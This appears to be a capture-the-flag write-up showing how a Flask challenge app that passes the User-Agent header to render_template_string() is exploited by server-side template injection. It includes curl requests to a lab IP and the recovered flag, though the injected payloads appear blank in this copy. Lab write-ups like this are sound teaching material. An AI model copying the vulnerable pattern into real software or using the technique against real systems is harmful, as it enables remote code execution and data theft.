root💀senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
CTF-:Platypwnies
CHALLENGES-:
- Web
- OS Detection
OS DETECTION
- I discovered the source code in route
/source.
❯ curl http://10.71.6.5:5000/source
<pre>from flask import Flask, request, render_template, render_template_string
from ua_parser import user_agent_parser
app = Flask(__name__)
@app.route("/")
def home():
user_agent = request.headers.get('User-Agent')
try:
parsed_string = user_agent_parser.Parse(user_agent)
family = parsed_string['os']['family']
user_agent_hint = render_template_string(user_agent)
return render_template('index.html', os=family, user_agent=user_agent_hint)
except Exception as e:
return render_template('failure.html', error=str(e))
@app.route("/source")
def source():
code = open(__file__).read()
return render_template_string("<pre></pre>", code=code)
if __name__ == "__main__":
# No debug, that would be insecure!
#app.run(debug=True)
app.run()
</pre>%
- The sink is stated below.
user_agent = request.headers.get('User-Agent')
try:
parsed_string = user_agent_parser.Parse(user_agent)
family = parsed_string['os']['family']
user_agent_hint = render_template_string(user_agent)
return render_template('index.html', os=family, user_agent=user_agent_hint)
- The code is vulnerable to SSTI because the
User-Agentheader is passed to functionrender_template_string().
❯ curl http://10.71.6.5:5000/ -H "User-Agent: " | grep "49"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1672 100 1672 0 0 1751 0 --:--:-- --:--:-- --:--:-- 1750
<pre>49</pre>
- Flag-:
PP{h4ck3r-OS-d3t3ct3d::7pe6PXP-ZkPe}
❯ curl http://10.71.6.5:5000/ -H "User-Agent: " | grep "PP"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1706 100 1706 0 0 5082 0 --:--:-- --:--:-- --:--:-- 5077
<pre>PP{h4ck3r-OS-d3t3ct3d::7pe6PXP-ZkPe}</pre>